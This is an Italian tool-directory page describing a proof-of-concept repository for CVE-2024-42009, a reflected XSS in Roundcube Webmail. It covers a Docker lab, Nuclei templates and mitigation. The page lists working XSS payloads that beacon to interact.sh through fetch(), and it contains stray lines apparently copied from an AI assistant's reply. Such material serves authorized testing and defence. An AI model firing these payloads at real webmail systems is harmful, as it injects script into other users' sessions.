Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-42009 — Modelli Nuclei e lab Docker per dimostrare e validare CVE-2024-42009, una XSS riflessa in Roundcube Webmail, utilizzando il rilevamento Out-of-Band tramite Interactsh per test autorizzati. | Kitploit
Strumenti/GitHubGitHub/shubhankargupta691/cve-2024-42009
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubshubhankargupta691/cve-2024-42009

CVE-2024-42009

Modelli Nuclei e lab Docker per dimostrare e validare CVE-2024-42009, una XSS riflessa in Roundcube Webmail, utilizzando il rilevamento Out-of-Band tramite Interactsh per test autorizzati.

Vedi Repository
211 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-42009 – XSS riflesso in Roundcube Webmail

📌 Panoramica

Questo repository contiene un template Nuclei e risorse di supporto per dimostrare e validare in sicurezza CVE-2024-42009, una vulnerabilità critica di XSS riflesso in Roundcube Webmail. Il difetto risiede nella funzione message_body() in show.php, dove le modifiche post-sanificazione portano a desanificazione e rendering non sicuro di contenuti email HTML appositamente creati.

⚠️ Questo PoC è destinato esclusivamente a scopi educativi e test autorizzati. Non utilizzarlo contro sistemi che non possiedi o per i quali non hai esplicita autorizzazione di test.


🧠 Riepilogo della vulnerabilità

  • ID CVE: CVE-2024-42009
  • Gravità: Critica (CVSS 9.8)
  • Versioni interessate: Roundcube ≤ 1.6.7 e ≤ 1.5.7
  • Versioni corrette: 1.6.8 e 1.5.8
  • Componente: message_body() in show.php
  • Impatto: Esecuzione arbitraria di JavaScript quando un utente visualizza un'email dannosa

  • 🧪 Strategia di rilevamento (solo uso in laboratorio)

    Questo repository utilizza il rilevamento Out-of-Band (OOB) tramite Interactsh per confermare l'esecuzione di JavaScript in un laboratorio controllato.

    Passaggi chiave:

    1. Distribuire un'istanza vulnerabile di Roundcube (ad es. tramite Docker)
    2. Inviare un'email appositamente costruita con tag <body> contenente onanimationstart e un beacon verso Interactsh
    3. Aprire l'email nell'interfaccia di Roundcube
    4. Confermare il callback DNS/HTTP verso il dominio Interactsh

    🐳 Configurazione del laboratorio

    Utilizza il file Docker Compose fornito per avviare un'istanza locale di Roundcube con MailHog (sink SMTP) e MariaDB.

    root@kitploit:~
    git clone https://github.com/Shubhankargupta691/CVE-2024-42009.git
    cd CVE-2024-42009
    docker compose up -d
    
    • Interfaccia Roundcube: http://localhost:8080
    • Interfaccia MailHog: http://localhost:8025
    • Metodo di accesso: Account Google

    ⚠️ Non utilizzare il tuo account Google.


    📁 Contenuto del repository

    • CVE-2024-42009-OOB.yaml – Template Nuclei con rilevamento Interactsh e Out-of-Band (OOB)
    • CVE-2024-42009.yaml – Template Nuclei senza Interactsh e OOB
    • docker-compose.yml – Configurazione dell'ambiente di laboratorio per Roundcube Webmail
    • Images/ – Screenshot che mostrano gli hit HTTP/DNS da Interactsh

    🎥 Dimostrazione video

    Questo video illustra l'intera catena di exploit:

    • Creazione del payload
    • Invio tramite email o endpoint
    • Attivazione della vulnerabilità
    • Conferma del beacon tramite Interactsh

    (dimostrazione video)


    Per includere responsabilmente questi payload XSS nel tuo README, dovrai inserirli in una sezione chiaramente etichettata per scopi educativi o di test. Ecco una struttura suggerita:


    🧪 Esempi di payload XSS (solo per scopi di test)

    ⚠️ Disclaimer: Questi payload sono destinati esclusivamente a uso educativo e test di sicurezza autorizzati. Non distribuirli su sistemi senza autorizzazione esplicita.

    root@kitploit:~
    <!-- Image tag with onerror -->
    <img src="https://interact.sh/xss-test" onerror="fetch('https://interact.sh/hit')">
    
    <!-- Broken image source with onerror -->
    <img src="https://raw.githubusercontent.com/shubhankargupta691/cve-2024-42009/main/x" onerror="fetch('https://interact.sh/hit')">
    
    <!-- SVG with onload -->
    <svg onload="fetch('https://interact.sh/hit')"></svg>
    
    <!-- Script tag -->
    <script>fetch('https://interact.sh/hit')</script>
    
    <!-- JavaScript in iframe src -->
    
    

    🧭 Come usare

    • Sostituisci https://interact.sh/hit con il tuo endpoint listener.
    • Usali in ambienti controllati come laboratori locali o piattaforme CTF.
    • Monitora il tuo endpoint per le richieste in arrivo per validare l'esecuzione.

    🛡️ Mitigazione

    Aggiorna Roundcube a:

    • 1.6.8 o 1.5.8
      Queste versioni rimuovono la logica di post-elaborazione vulnerabile e applicano una sanificazione più severa e header CSP.

    📜 Riferimenti

    Perfetto — ecco una sezione Riferimenti pulita e professionale che puoi includere nel tuo README o nell'invio via email per CVE-2024-42009. Cita tutte le fonti che hai elencato, formattate per chiarezza e credibilità:


    📚 Riferimenti

    • Scheda CVE NVD – CVE-2024-42009 – Elenco ufficiale della vulnerabilità con punteggio CVSS e versioni interessate
    • SonarSource Blog – Government Emails at Risk – Analisi tecnica approfondita e dettagli sullo sfruttamento
    • PoC GitHub di DaniTheHack3r – Exploit basato su Python con listener email e payload attivato da animazione
    • PoC GitHub di Bhanunamikaze – Iniezione automatica di payload ed esfiltrazione tramite listener HTTP
    • PoC GitHub di 0xbassiouny1337 – Exploit XSS persistente con acquisizione e decodifica email in tempo reale
    Scarica lo strumento